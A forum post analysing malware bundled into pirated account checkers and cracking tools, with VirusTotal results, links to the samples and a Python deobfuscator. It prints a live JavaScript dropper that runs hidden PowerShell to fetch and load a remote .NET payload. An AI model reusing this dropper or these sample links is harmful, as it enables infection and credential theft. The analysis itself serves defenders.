Malbusted | vicen1985 09-02-2020, 05:01 AM
![[Image: malbusted.png]](https://i.ibb.co/HHDYJDv/malbusted.png)
Code:
########################################################################################################
Malware Structure:
The malware has been injected into a silent installer containing the actual application, & the installer has
been made to extract the malicious scripts into %appdata% and load them. I however haven't been able to load
the actual application, so I am not sure if the installer starts the application or not when finished.
Weak point of it:
The malware author used Nullsoft Scriptable Install System to create their malicious installer; however,
it is really easy to extract: using 7-Zip & opening the malicious installer with "Open As *" reveals its content.
(PS: The Fortnite thread had an installer whose content I haven't been able to unpack without directly
running it in a sandbox; none of my tools were able to extract its content directly, which sucks.)
Please note that the following files present in the installer have their content available on a raw Pastebin page, which is given here:
l.vbs: https://pastebin.com/raw/ekHNrJ93
r.vbs: https://pastebin.com/raw/B43XUmxb
w.vbs: https://pastebin.com/raw/WZyKQTDD
n.js:
var shell = WScript.CreateObject("WScript.Shell");
var ASWEAD = "wer"
shell.Run("po"+ASWEAD+"shell -windowstyle hidden -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing(''http://www.asmreekasounds.com/upfiles/up_down/6c5b3796f4091426f3b34bace39c89c7.mp3'')'));[<##>AppDomain<##>]::<##>('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64).'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))($null,$null)");
### Downloads ###
RDP Checker: https://mega.nz/file/M3ZggQRa#JJzoF0Hu63m2t4ZQIebSnBRoDz1FpcryxiuXWBF6jp8
Netflix Checker: https://mega.nz/file/UvJUHIiI#aOOse6YKkKf8jLYfP2fHFZcPGPOLX8be6bKKhERXsIk
LJXD 1.7: https://mega.nz/file/w3RQ2YRZ#bEu1xxq1zrLBX8r1NCHunh1pJ31U8BMOyBeHsGMqdGE
IPTV Cracking Tool: https://mega.nz/file/d7QA1aCb#I5meoYSSoO0DLNU3wzKGL1wFzki9j6qqqnxVshHUpgc
### Download Malware Samples ###
(the links are from the original threads)
RDP Checker: https://anonfile.com/TaPeY07fna/MultiRDP_Checker_1.0.0.0_alpha_rar | https://www.sendspace.com/file/o263v5
Netflix Checker: https://anonfile.com/08lcZb7dnb/Checker_Netflix_By_Burnwood_Edition_Free_rar | https://www.sendspace.com/file/y9p8b8
LJXD 1.7: https://anonfile.com/j6Z1Za7bn6/INTERHOOK_CS_GO_LJXD_Injector_rar | https://www.sendspace.com/file/ki71hz
IPTV Cracking Tool: https://anonfile.com/g2r1Z27dnf/IPTV_Multi_Tool_By_Mohamed.Khater_v7_rar | https://www.sendspace.com/file/kv2mn9
Fortnite Macro: https://anonfile.com/k5ZfZ77bnb/Fortnite_Macro_Building_Script_AutoHotkey_1.1.31.00_rar | https://www.sendspace.com/file/5y6op5
########################################################################################################
Thread Link: https://sinister.ly/Thread-Leak-NEW-FAST-MultiRDP-Checker-1-0-0-0-alpha-2019
Unpacked Files:
- RdpChecker.V1.0.exe | Virustotal Scan [45/69]: https://www.virustotal.com/gui/file/3c3357697e6d46025d1be95b74a08f041a3422a5ad6fa1eadc70dad9349fb3cd/detection
|- l.vbs
|- RdpChecker.V1.0.exe | Virustotal Scan [4/73]: https://www.virustotal.com/gui/file/2842bdb2938e021fdce35c566f63c218451b3e7403787f8b80024c72425da668/detection
|- n.js
|- r.vbs
|- w.vbs
### - RdpChecker.V1.0.exe (unpacked) - ###
### MD:
CodeLang: VB.NET / C#
Obfuscated: Yes (.NET Reactor 4.8)
########################################################################################################
Thread Link: https://sinister.ly/Thread-Leak-CHECKER-NETFLIX-By-Burnwood-VERY-FAST-2019
Unpacked Files:
- NETFL_X CHECKER V3.1.exe | Virustotal Scan [47/69]: https://www.virustotal.com/gui/file/6e894ccef531f9cbb056d235525d6220a643983c39436312c1ae8e3b32fdaa57/detection
|- l.vbs
|- NETFL_X CHECKER V3.0.exe | Virustotal Scan [37/67]: https://www.virustotal.com/gui/file/e741fdfcddd4a75c2e4769c10e631d3b78bc691a0cf92c4d15eda901fadda274/detection
|- n.js
|- r.vbs
|- w.vbs
### - NETFL_X CHECKER V3.0.exe (unpacked) - ###
### MD:
CodeLang: VB.NET / C#
Obfuscated: Yes (Beds Protector) | The application crashes on start
########################################################################################################
Thread Link: https://sinister.ly/Thread-Leak-NEW-INTERHOOK-CS-GO-LJXD-Injector-v1-7
Unpacked Files:
- LJXD 1.7.exe | Virustotal Scan [33/68]: https://www.virustotal.com/gui/file/476ac845bca03aa7686f7c32ec5a0e3c481abc6704d70bc91f3b6137175eb6e2/detection
|- l.vbs
|- LJXD 1.7.exe | Virustotal Scan [33/71]: https://www.virustotal.com/gui/file/6392c1a17b8e55be0fd0bb6793f996adb9d89a5ccb14f2be5739b394061499e8/detection
|- n.js
|- r.vbs
- INTERHOOK.dll | Virustotal Scan [40/70]: https://www.virustotal.com/gui/file/177796eb4782aa2e1ca3eb2eb66b7399686532e73eb47fba0b76e01199cc2aec/detection
### - LJXD 1.7.exe - ###
### MD:
CodeLang: Obj-C / C++ / C
########################################################################################################
Thread Link: https://sinister.ly/Thread-Leak-NEW-Fortnite-Macro-Building-Script-AND-RAMP-RUSH
Unpacked Files:
- AutoHotkey_1.1.31.00_setup.exe
|- l.vbs
|- n.js
|- r.vbs
|- w.vbs
- Fortnite-macro_RecON Y RAMP.ahk | Doesn't seem to be malicious, can be viewed in a text editor
(I do not know what else the installer contains; the only content that I have been able to access was the listed files.
The installer might contain more, but I haven't been able to reach anything else.)
########################################################################################################
Thread Link: https://sinister.ly/Thread-Leak-NEW-IPTV-Multi-Tool-By-Mohamed-Khater-v-7
Unpacked Files:
- IPTV_Cracking_Tool_v7.exe | Virustotal Scan [44/72]: https://www.virustotal.com/gui/file/cf5f9e2147dce5ee5b5a3a0ffb9c8980cc9c2a51465a36ae79eb3ffb77e9bba1/relations
|- IPTV_Cracking_Tool.exe | Virustotal Scan [7/68]: https://www.virustotal.com/gui/file/a931f52261ecdaa4b09bdc9a6287fa0cec8167e2e237b9cd9964f5e1099a27aa/detection
|- l.vbs
|- n.js
|- r.vbs
|- w.vbs
### - IPTV_Cracking_Tool.exe - ###
### MD:
CodeLang: VB.NET / C#
Obfuscated: Yes (couldn't deobfuscate, .NET Reactor 4.8)
########################################################################################################
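An added analysis helper (written here, not part of the post) that statically rebuilds the PowerShell command the n.js dropper above hands to WScript.Shell.Run, strips its string obfuscation (`<##>` comments, `.replace()` chains, `'a'+'b'` joins, `.('Name')` member lookups) and reports the indicators a defender needs; the embedded sample is the post's n.js with the real download URL replaced by a placeholder.

```python
import re

# Constructed sample: the post's n.js with the real download URL replaced by a placeholder.
NJS_SAMPLE = (
    'var shell = WScript.CreateObject("WScript.Shell");\n'
    'var ASWEAD = "wer"\n'
    'shell.Run("po"+ASWEAD+"shell -windowstyle hidden -noexit [Byte[]]$sc64= '
    "iex(iex('(&(GCM *W-O*)'+ 'Net.'+'WebC'+'lient)'+'.Dow'+'nload'+'Str'+'ing("
    "''http://example.invalid/upfiles/payload.mp3'')'));[<##>AppDomain<##>]::<##>"
    "('^urrentDomain'.replace('^','C'))<##>.<##>('%oad'.replace('%','L'))($sc64)"
    ".'EntryPoint'<##>.<##>('in@okg'.replace('g','e').replace('@','v'))"
    '($null,$null)");'
)

def run_argument(src):
    """Rebuild the string handed to WScript.Shell.Run, resolving "a"+VAR+"b" joins."""
    variables = dict(re.findall(r'var\s+(\w+)\s*=\s*"([^"]*)"', src))
    expr = re.search(r'\.Run\((.*)\);', src, re.S).group(1)
    parts = re.findall(r'"([^"]*)"|(\w+)', expr)
    return ''.join(lit or variables.get(name, name) for lit, name in parts)

def deobfuscate_powershell(cmd):
    """Undo the tricks hiding the loader's keywords: <##> comments, .replace(), 'a'+'b', .('Name')."""
    cmd = re.sub(r'<#.*?#>', '', cmd)
    rules = [
        (r"'([^']*)'\.replace\('([^']*)','([^']*)'\)",
         lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'"),
        (r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'"),  # 'Dow'+'nload' -> 'Download'
        (r"(::|\.)\('(\w+)'\)", r"\1\2"),            # .('Load') -> .Load
        (r"\.'(\w+)'", r".\1"),                      # .'EntryPoint' -> .EntryPoint
    ]
    changed = True
    while changed:  # repeat until no rule rewrites anything
        changed = False
        for pattern, repl in rules:
            new = re.sub(pattern, repl, cmd)
            changed |= new != cmd
            cmd = new
    return cmd

def triage(njs_source):
    """Defender-side indicators: the real command line, staging URL and in-memory .NET load."""
    cmd = deobfuscate_powershell(run_argument(njs_source))
    return {
        "command": cmd,
        "hidden_window": "-windowstyle hidden" in cmd.lower(),
        "download_urls": re.findall(r"""https?://[^\s'"()]+""", cmd),
        "in_memory_assembly_load": "::CurrentDomain.Load(" in cmd and ".EntryPoint" in cmd,
    }
```

The decoded command shows the two things worth alerting on in endpoint telemetry: a hidden powershell.exe spawned by wscript.exe, and a .NET assembly fetched over HTTP (disguised as an .mp3) and loaded straight from memory via AppDomain.CurrentDomain.Load.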